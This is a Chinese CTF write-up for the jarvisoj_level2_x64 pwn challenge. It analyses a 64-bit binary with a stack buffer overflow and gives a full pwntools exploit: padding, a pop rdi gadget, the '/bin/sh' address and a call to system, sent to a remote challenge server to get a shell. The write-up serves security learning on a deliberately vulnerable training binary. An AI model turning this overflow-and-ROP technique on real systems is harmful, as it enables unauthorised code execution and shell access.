解题思路:
泄露或修改内存数据:
- 堆地址:无需
- 栈地址:[[Stack上函数传参]]
- libc地址:无需
- BSS段地址:无需
劫持程序执行流程:[[ret2text(栈溢出的gadgets利用)]]
获得shell或flag:[[调用程序中的system]]
学到的知识:
题目信息:
┌──(kali㉿kali)-[~/Desktop]
└─$ file jarvisoj_level2_x64
jarvisoj_level2_x64: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=17f0f0026ee70f2e0c8c600edcbe06862a9845bd, not stripped
┌──(kali㉿kali)-[~/Desktop]
└─$ checksec --file=jarvisoj_level2_x64
RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Fortified Fortifiable FILE
No RELRO No canary found NX enabled No PIE No RPATH No RUNPATH 68) Symbols No 0 1jarvisoj_level2_x64
libc版本:
wp借鉴:
核心伪代码分析:
存在利用的的代码:
ssize_t vulnerable_function()
{
char buf[128]; // [rsp+0h] [rbp-80h] BYREF
system("echo Input:");
return read(0, buf, 0x200uLL);
}
int __cdecl main(int argc, const char **argv, const char **envp)
{
vulnerable_function(argc, argv, envp);
return system("echo 'Hello World!'");
}
分析:
使用栈溢出字符串表中有“/bin/sh”,call_system调用函数,传参rdi。
脚本:
from pwn import *
context(log_level='debug',arch='amd64',os='linux')
pwnfile='./jarvisoj_level2_x64'
sh=remote('node4.buuoj.cn',27038)
elf = ELF(pwnfile)
#sh=process(pwnfile)
bin_sh_addr=0x600A90
call_system=0x400603
pop_rdi_ret=0x4006b3
payload=0x88*b'a'+p64(pop_rdi_ret)+p64(bin_sh_addr)+p64(call_system)
sh.sendline(payload)
#gdb.attach(sh)
#pause()
sh.interactive()